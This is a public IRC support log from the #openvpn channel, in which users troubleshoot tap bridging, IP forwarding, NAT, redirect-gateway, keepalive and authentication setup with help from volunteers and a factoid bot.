02:09 < Nemus> http://pastebin.com/hXjd2irW
02:10 < Nemus> hmm I only ever see tap1 in the ip a info
02:11 < pekster> Did I mention yet how ifconfig sucks? :)
02:11 < Nemus> lol you did
02:11 < pekster> It's in your server logs as tap1 when openvp starts up
02:11 < pekster> openvpn*
02:11 < pekster> Line 146 in that latest paste
02:11 < pekster> That's of course a problem
02:12 < pekster> Use --dev tap0 explicitly in your config, or dynamically manage the port addition of the device to the bridge on startup
02:12 < Nemus> okay sweet
02:12 < Nemus> thank you so much
02:13 < Nemus> so when I start the server i put --dev tap0
02:14 < pekster> In your config files works too
02:14 < pekster> !--
02:14 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file.
02:14 < pekster> The issue is that openvpn sees tap0 and since you didn't tell it to use it (you must have created this before you started openvpn?) it dynamically creates another device it calls tap1
02:15 < pekster> tap1 isn't part of your bridge, thus it is a floating island by itself and traffic never goes anywhere, just like a PC connected to a switch by itself
02:17 < Nemus> makes sense
02:17 < Nemus> and now it's working!
02:17 < Nemus> thank you so much for your help
02:18 < Nemus> pekster you're the best!
02:18 < pekster> No problem. Thank me by avoiding use of ifconfig in the future ;)
02:18 < Nemus> will do
02:18 < pekster> (NB: ifconfig -a would have shown you tap1. It's still an awful tool when used under Linux.)
02:25 -!- joako [~joako@opensuse/member/joak0] has quit [Ping timeout: 260 seconds]
02:30 -!- master_of_master [~master_of@p4FF24408.dip.t-dialin.net] has joined #openvpn
02:33 -!- master_o1_master [~master_of@p4FF244AC.dip.t-dialin.net] has quit [Ping timeout: 260 seconds]
02:45 < jzaw> pekster ... is there something in server.conf that i could have removed that stops the route for the ipv4 ip of the ovpn server being added once tap0 is up
02:45 < jzaw> I'm having to add it manually
02:45 < jzaw> I'm sure it used to be added automatically ... but i touched the conf ;)
02:47 < jzaw> ahh is that the difference between local + server vs server-bridge ?
02:48 < jzaw> server-bridge adds that extra route to always go to the server via internet ! vpn
02:50 -!- jgeboski- [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
03:01 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
03:12 -!- jgeboski- is now known as jgeboski
03:18 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
03:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
03:42 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds]
03:46 -!- [fred] [fred@konfuzi.us] has joined #openvpn
03:52 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds]
04:03 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 264 seconds]
04:04 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn
04:07 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
04:12 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer]
04:13 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
04:23 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 260 seconds]
04:34 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
04:41 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
04:43 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Operation timed out]
04:43 -!- master_o1_master [~master_of@p4FF247E1.dip.t-dialin.net] has joined #openvpn
04:44 -!- master_of_master [~master_of@p4FF24408.dip.t-dialin.net] has quit [Read error: Operation timed out]
04:46 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds]
04:47 -!- novaflash is now known as novaflash_away
04:47 -!- novaflash_away is now known as novaflash
04:47 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn
04:47 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host]
04:47 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn
04:57 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Quit: Herpa la Derpa]
04:59 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn
05:01 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
05:06 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
05:25 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
05:29 -!- dazo_afk is now known as dazo
05:39 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
05:40 -!- master_of_master [~master_of@p4FF24517.dip.t-dialin.net] has joined #openvpn
05:43 -!- master_o1_master [~master_of@p4FF247E1.dip.t-dialin.net] has quit [Ping timeout: 245 seconds]
05:59 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 248 seconds]
06:05 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection]
06:19 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn
06:22 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn
06:22 -!- zz_AsadH is now known as AsadH
06:22 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host]
06:22 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn
06:34 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
06:38 -!- Starscreamer [~starscrea@217.41.69.72] has joined #openvpn
06:39 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds]
06:47 -!- kubbing [~kubbing@gprs11.vodafone.cz] has joined #openvpn
06:52 -!-
Starscreamer [~starscrea@217.41.69.72] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 06:52 -!- kubbing [~kubbing@gprs11.vodafone.cz] has quit [Remote host closed the connection] 06:59 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has joined #openvpn 07:06 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 07:10 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 07:19 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!] 07:19 -!- gardar [~gardar@gardar.net] has joined #openvpn 07:22 -!- rkantos [robin@109.169.7.197] has quit [Ping timeout: 260 seconds] 07:22 -!- rkantos [robin@4e.fi] has joined #openvpn 07:23 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has joined #openvpn 07:33 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 07:45 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 07:50 -!- cpm [~Chip@pdpc/supporter/active/cpm] has left #openvpn [] 07:52 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 08:18 -!- Teck7__ [~teck7@bas1-montreal54-1279375478.dsl.bell.ca] has quit [Quit: Leaving] 08:20 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:40 -!- rufianw [~ntrrgc@79.109.52.159.dyn.user.ono.com] has joined #openvpn 08:40 < rufianw> !welcome 08:40 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 08:40 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 08:41 < rufianw> !howto 08:41 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 08:45 < rufianw> I am trying to make my virtual network (which is physically on my laptop) reachable from other hosts from the same network. I have a virtual machine with routing, DHCP and DNS, which serves the rest of virtual machines as gateway. 08:47 < rufianw> To start with the VPN setup, I created a new virtual machine with bridged interfaces (so it's like a computer on the same network as my laptop, but it isn't inside the virtual network), and now I am trying to do first VPN connectivity checks. 08:47 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 08:48 < rufianw> I tried the example 1 here. http://openvpn.net/index.php/open-source/documentation/manuals/65-openvpn-20x-manpage.html#lbAV 08:48 <@vpnHelper> Title: OpenVPN 2.0.x (at openvpn.net) 08:49 < rufianw> And the issue currently is I am getting warnings like this: 'ifconfig' is used inconsistently, local='ifconfig 10.4.0.1 10.4.0.2', remote='ifconfig 10.4.0.2 10.4.0.1' 08:50 < rufianw> I can't understand why those warnings emerge. 08:50 < rufianw> Also, VPN is not working. 08:50 < rufianw> Any help? 08:51 < rufianw> I should note the VPN server is NATted, but the port is open. 08:56 < rufianw> Oh. This is strange. If I init the server, but not the client, the warning appears anyway. 08:56 < rufianw> It seems like if it is trying to connect to itself. 
09:00 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
09:05 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
09:06 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn
09:13 < rufianw> Hmm... edited the NAT port forwarding settings, and I got rid of the warning... but it is still not working.
09:13 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has joined #openvpn
09:14 < rufianw> Packets are sent from client to server, and the server logs "Peer Connection Initiated" and "Initialization Sequence Completed", but it does not send packets through the wire.
09:15 < stan_man_can> 1ipforward
09:16 < stan_man_can> !ipforward
09:16 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
09:16 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Read error: Connection reset by peer]
09:16 < stan_man_can> !osxipforward
09:16 <@vpnHelper> "osxipforward" is (#1) sysctl -w net.inet.ip.forwarding=1 for a temp solution or (#2) add IPFORWARDING=-YES- in /etc/hostconfig for a permanent solution
09:16 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn
09:17 < TheWarden> why is it a good idea to reduce the OpenVPN daemon's privileges to user nobody group nogroup ?
09:18 < stan_man_can> is that IPFORWARDING in the hosts file supposed to go on my OSX or the openvpn server?
09:21 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds]
09:21 < stan_man_can> 1nat
09:21 < stan_man_can> !nat
09:21 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) don't forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto
09:22 < stan_man_can> !linnat
09:22 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat
09:23 < rob0> Stan, /etc/hostconfig is not an openvpn file, and "IPFORWARDING" is not an openvpn directive.
09:23 < stan_man_can> : "osxipforward" is (#1) sysctl -w net.inet.ip.forwarding=1 for a temp solution or (#2) add IPFORWARDING=-YES- in /etc/hostconfig for a permanent solution
09:23 < rob0> rufianw, I did not see your pastebin anywhere.
09:24 < stan_man_can> rob0 ^
09:24 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Excess Flood]
09:24 < rob0> TheWarden, as with all Unix daemons, the idea of privilege reduction is to reduce the potential risk of a successful exploit.
09:25 < rob0> (an attacker might gain the ability to run undesired code, but not run it as root.)
09:26 < rob0> 14:18 < stan_man_can> is that IPFORWARDING in the hosts file supposed to go on my OSX or the openvpn server?
09:26 < dioz> i don't always PC
09:26 < dioz> but when i do i use root
09:26 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn
09:26 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host]
09:26 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
09:27 < stan_man_can> rob0: so then it goes on my client?
09:27 < rob0> You're overestimating my magical abilities.
09:29 < rufianw> I got it to connect... on TCP.
09:29 < stan_man_can> i'm just trying to get it working so I can use my openvpn server as a proxy server so I can have a US ip
09:29 < stan_man_can> i can connect to the openvpn server just fine, but haven't got the ipforwarding part working
09:29 < stan_man_can> i did !def1
09:29 < stan_man_can> !def1
09:29 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
09:30 < rob0> !redirect 4
09:30 < rob0> !redirect 3
09:30 < rob0> !redirect
09:30 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
09:30 <@vpnHelper> http://ircpimps.org/redirect.png
09:30 < rob0> #4, flowchart
09:31 < rufianw> Ok, it works only in TCP. I don't mind really. Is there any reason to use UDP?
09:32 < rob0> !tcp
09:32 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay
09:32 < stan_man_can> !def1
09:32 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
09:32 < rufianw> :\
09:33 < stan_man_can> wait, does the push redirect-gateway go on the client or server?
09:34 < rob0> --push is to set client directives server-side.
09:36 -!- _quadDam1ge is now known as _quadDamage
09:37 < stan_man_can> whenever I add the push "dhcp-option DNS 10.8.0.1" directive my connection to the openvpn server continually connects
09:38 < rufianw> Well, it seems it won't work with UDP, so I'll carry on with TCP.
09:39 < rufianw> Next step: Can I set up a bridged VPN without auth or encryption?
09:40 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has quit [Quit: stan_man_can]
09:45 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn
09:50 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Read error: Connection reset by peer]
09:50 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn
09:52 < TheWarden> rob0: oh okay mmmm
09:52 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn
09:53 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Remote host closed the connection]
09:58 < TheWarden> In order to use the openvpn-plugin-auth-pam one must have auth-user-pass-verify and plugin /usr/lib/openvpn/plugins/openvpn-plugin-auth-pam.so service-type and plugin /usr/lib/openvpn/plugins/openvpn-plugin-auth-pam.so "login login USERNAME password PASSWORD" ?
10:06 < rufianw> Hmm... I managed to modify the test connection script to do it, but it only allows one client.
10:08 -!- kubbing_ [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn
10:08 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Read error: Connection reset by peer]
10:08 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
10:08 -!- mode/#openvpn [+o mattock] by ChanServ
10:08 < TheWarden> there must be some instructions somewhere on how to achieve this OpenVPN PAM authentication to active directory. I don't even know if I have things set up properly to even achieve this.
10:09 < TheWarden> I've been following this as this has been the only resource I've found that somewhat explains the situation, yet somehow I don't think it has everything in order for it to work.
10:10 < rufianw> This is the output of the client: http://dpaste.de/ftqkO/
10:10 < rufianw> The server does not show anything special. Not even that it received a new connection.
10:11 < TheWarden> so frustrating.... there has to be someone out there that has done this.
10:13 < TheWarden> I wonder would this even apply to OpenVPN 2.3.0. https://www.packtpub.com/openvpn-2-cookbook/book ? I believe the book was written for OpenVPN v2.2.0....
10:13 <@vpnHelper> Title: OpenVPN 2 Cookbook | Packt Publishing (at www.packtpub.com)
10:13 < rufianw> "OpenVPN as a , forking TCP server which can service multiple clients over a single TCP port?" <<< this is in the FAQ. I'll check it...
10:14 -!- pulz [geir@winning.no] has quit [Read error: Operation timed out]
10:14 -!- pulz [geir@winning.no] has joined #openvpn
10:20 -!- raidz_away is now known as raidz
10:23 < TheWarden> argh so can someone tell me this, does one use the PAM plugin as a replacement for auth-user-pass-verify or does one need to use the PAM plugin and the auth-user-pass-verify?
10:27 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
10:30 < rufianw> "--inetd nowait can only be used in TLS mode" <<< why?
10:41 -!- DBordello [~DBordello@unaffiliated/dbordello] has left #openvpn ["Leaving"]
10:50 < rufianw> "--mode server requires --tls-server" <<< is it me, or won't OpenVPN let me do almost anything "insecurely"?
10:50 < rufianw> I do not want to create keys and give each user a key.
10:59 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 252 seconds]
11:00 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn
11:04 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn
11:20 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 246 seconds]
11:21 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
11:34 < jzaw> yea! \0/ it's working
11:37 < jzaw> pastebin says i've reached my 25 unlisted pastes
11:37 < jzaw> upgrade now $2 a month
11:37 < jzaw> what's a good free paste type site?
11:37 < jzaw> oops sorry wrong channel
11:37 < hazardous> zerobin
11:37 < hazardous> sebsauvage.net/paste/
11:38 < jzaw> or not as the case may be ... turns out to be the right channel
11:38 < jzaw> :D
11:38 < jzaw> thanks
11:38 * jzaw very pleased with new vpn
11:38 * hazardous very pleased with novaflash
11:38 * novaflash very hazardous with hazard's ass
11:38 < jzaw> but if you do use m0n0wall or openwrt ... pls get yourself a big 2x4 to bash them with
11:39 <@novaflash> jzaw: what's with monowall..?
11:39 < jzaw> similar to openwrt
11:39 <@ecrist> jzaw: stop posting unlisted pastes
11:39 < jzaw> firewall router s/w
11:39 < jzaw> ecrist, i could do that
11:39 <@ecrist> seems easy enough to me
11:39 <@ecrist> !topsecret
11:39 <@vpnHelper> "topsecret" is if your setup is so top secret that you can't post your configs or logs, please leave now and go find support you trust.
11:39 < jzaw> but i'd be embarrassed if people saw some of my errors in scripts etc
11:40 <@ecrist> get over it
11:40 <@ecrist> :)
11:40 < jzaw> true true
11:40 <@ecrist> OR pay the $2
11:40 <@novaflash> yes we prefer to see people embarrassed
11:40 * jzaw blushes
11:43 < jzaw> novaflash, ah i just re-read your question .... m0n0wall ... running a ovpn server on a box behind m0n0wall ... you set a static route back to the server .... allow traffic on the lan port
11:43 < jzaw> but no go
11:44 < jzaw> i didn't read too much deeper after i found the right setting ... something to do with icmp-redirect (or maybe not, but googling that topic found the answer)
11:44 < jzaw> there's a setting
11:44 < jzaw> ...
11:44 < jzaw> http://photos.dzki.co.uk/m0n0wall_adv_setting_bypass_fw_same_interface.png
11:44 -!- eggy [uid554@gateway/web/irccloud.com/x-parhtlctkgnhjhaw] has joined #openvpn
11:44 < jzaw> you have to tick that .. then it works
11:45 < jzaw> with openwrt the usual iptables FORWARD tap br-lan and br-lan tap and tap tap
11:47 < eggy> so.. I have openvpn set up on a separate 192.168.7.0/255.255.255.0 subnet; my lan is on the 192.168.1.0/255.255.255.0 subnet.. how do I set it up so my vpn clients have access to this subnet? Would I need to set up a bridge?
11:49 < jzaw> eggy .... (i'm new to the whole vpn thing) but i've found bridge vvvvvvv hard to get right and i've not had it going at all
11:49 < jzaw> i got routed tun working first
11:49 < jzaw> then just tried routed tap
11:50 < eggy> I've got my openvpn subnet working fine, haven't figured out how to introduce the secondary subnet.
11:50 < jzaw> is your vpn routed ? tap ? tun?
11:51 < eggy> tun, using the subnet type setting. openvpn seems to figure out the rest for me.
11:52 < eggy> reading a guide, I might be able to accomplish what I want using iptables actually.
11:54 < jzaw> wouldn't it just be routing?
11:58 -!- rufianw [~ntrrgc@79.109.52.159.dyn.user.ono.com] has quit [Quit: Konversation terminated!]
11:58 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
11:58 < rob0> iptables cannot fix broken routing, but it certainly can break working routes!
11:58 -!- AsadH is now known as zz_AsadH
12:06 -!- dzubey [~dzubey@68.14.254.195] has joined #openvpn
12:11 < eggy> I'm assuming so, but I don't know what the problem is.
12:11 < eggy> according to this: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting
12:11 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net)
12:11 < eggy> It should be working :/
12:12 < rob0> According to /topic, your problem is your firewall, really.
12:12 < rob0> !iptables
12:12 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) This is just the
12:12 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables
12:14 < TheWarden> okay, I've just exhausted all options that I can find or understand.
12:14 -!- brute11k [~brute@89.249.231.109] has joined #openvpn
12:15 -!- rooth_ [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Read error: Operation timed out]
12:15 -!- TheWarden_ [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn
12:17 < TheWarden_> Do I achieve this with the PAM or LDAP plugin or a script? or all three? If it's all three, which is the easiest? I can't find any instructions on specifics on the subject. I've read and read... please just point me in the right direction at least.
12:17 -!- TheWarden is now known as Guest88343
12:18 -!- Guest88343 [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Ping timeout: 245 seconds]
12:21 < eggy> figured it out, was a 'firewall' issue actually ;(
12:21 -!- TheWarden_ [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]]
12:26 -!- JSharpe [~JSharpe@5.63.146.148] has joined #openvpn
12:28 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has joined #openvpn
12:29 < jpalmer> hey guys. I have to use openvpn with tcp. but I'm having an issue where when the connection drops, the client doesn't realize it. so it doesn't tear it down and reconnect. I've seen a couple keepalive settings. but not sure which one I need to determine when the link is dead.
12:33 < jpalmer> I'm thinking of doing keepalive 30 120 but would like confirmation that it's going to do what I think.
12:37 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
13:13 <@ecrist> should work.
13:21 -!- eggy [uid554@gateway/web/irccloud.com/x-parhtlctkgnhjhaw] has left #openvpn []
13:32 -!- joeblow750 [~Adium@host86-180-155-170.range86-180.btcentralplus.com] has joined #openvpn
13:34 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds]
13:37 -!- raidz is now known as raidz_away
13:42 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
13:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
13:47 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds]
13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:53 < jpalmer> thanks ecrist
13:55 <@ecrist> np
13:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
14:00 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Remote host closed the connection]
14:00 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn
14:05 -!- joeblow750 [~Adium@host86-180-155-170.range86-180.btcentralplus.com] has quit [Ping timeout: 252 seconds]
14:11 -!- kubbing_ [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Remote host closed the connection]
14:21 -!- staticsafe [staticsafe@unaffiliated/staticsafe] has joined #openvpn
14:30 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal]
14:30 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn
14:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
14:39 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn
15:08 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
15:09 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Remote host closed the connection]
15:17 < jzaw> would it be wrong to have non rfc1918 ips on a LAN of a gw router (and dhcp handing them out to lan clients)
15:17 -!- JSharpe_ [~JSharpe@5.63.146.148] has joined #openvpn
15:17 -!- JSharpe [~JSharpe@5.63.146.148] has quit [Read error: Connection reset by peer]
15:17 -!- fogus [~fogus@pool-108-21-49-67.nycmny.fios.verizon.net] has joined #openvpn
15:17 < jzaw> and then vpn to a no nat network to whose gw those ips are routed
15:17 < jzaw> and then go down the vpn
15:18 < pekster> jzaw: Nothing wrong at all with that, provided you own the IPs you're allocating
15:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
15:18 < jzaw> but those non rfc1918 ips are behind nat
15:18 < fogus> Hello. I have openvpn installed and I need to add a new user. I looked through man openvpn... how can I see what version of openvpn I am running?
15:18 < jzaw> pekster, yes mine from my isp
15:18 < jzaw> i've got it going ... it's working exactly how i wanted
15:18 < pekster> Sure, then they're yours to do with as you see fit. Using public IPs has benefits as you've pointed out with avoiding the need for NAT
15:18 < jzaw> try ping fuji-pl.dzki.co.uk
15:19 < pekster> 100% loss
15:19 < jzaw> yeah?
15:19 < jzaw> hmm
15:19 < jzaw> good test
15:19 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn
15:19 < jzaw> i needed to test from without
15:19 < jzaw> cos so far i've been within
15:19 < pekster> http://paste.kde.org/696626/
15:20 < pekster> Oh, hang on, more hops showed up
15:20 < jzaw> that's going to be firewall ?
15:20 -!- Devastator [~devas@186.214.110.30] has joined #openvpn
15:20 < pekster> http://paste.kde.org/696632/
15:20 < jzaw> gosh that's a lot of hops
15:20 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection]
15:20 < fogus> How can I add a user to this openvpn? The existing users do not have linux accounts on this machine. I don't know how they were created in the first place. I don't see a web UI. I can't find an openvpn command that allows me to add a user.
15:21 < fogus> Some users do not even appear to have keys within /etc/openvpn/keys. 15:21 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 15:21 < jzaw> thats an interesting route pekster 15:21 < pekster> fogus: OpenVPN does not come with a web UI. If you're using the non-free commercial Access Server product, you want their channel, #openvpn-as 15:21 < jzaw> im begining to majorly dislike m0n0wall 15:21 < fogus> No, then I believe I am in the right channel, pekster. 15:21 < rob0> !howto 15:21 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 15:22 < pekster> fogus: Oh, "don't see", sorry mis-read that 15:22 < rob0> Generally an openvpn server will use TLS certificate authentication. 15:22 < rob0> fogus, who set this up for you? 15:22 < fogus> the previous admin. 15:23 < rob0> ah, well, let's hope he documented things for you. 15:23 < fogus> nope :) 15:23 < rob0> If you can't find where he ran his TLS CA, you'll have to start from scratch. 15:24 < pekster> Unless it's set up to use user-pass and no client certs, then you need to add the user to whatever backend auth system is being used 15:24 < pekster> (that would be outside of openvpn at that point) 15:24 < fogus> I'm looking for the steps that would be required to add a user in general. Then I will use `history` and `find` as with other problems I have faced I assume. 15:25 < pekster> See the howto for the certificate process 15:25 < fogus> it looks like he tried ldap at one point but may have given up 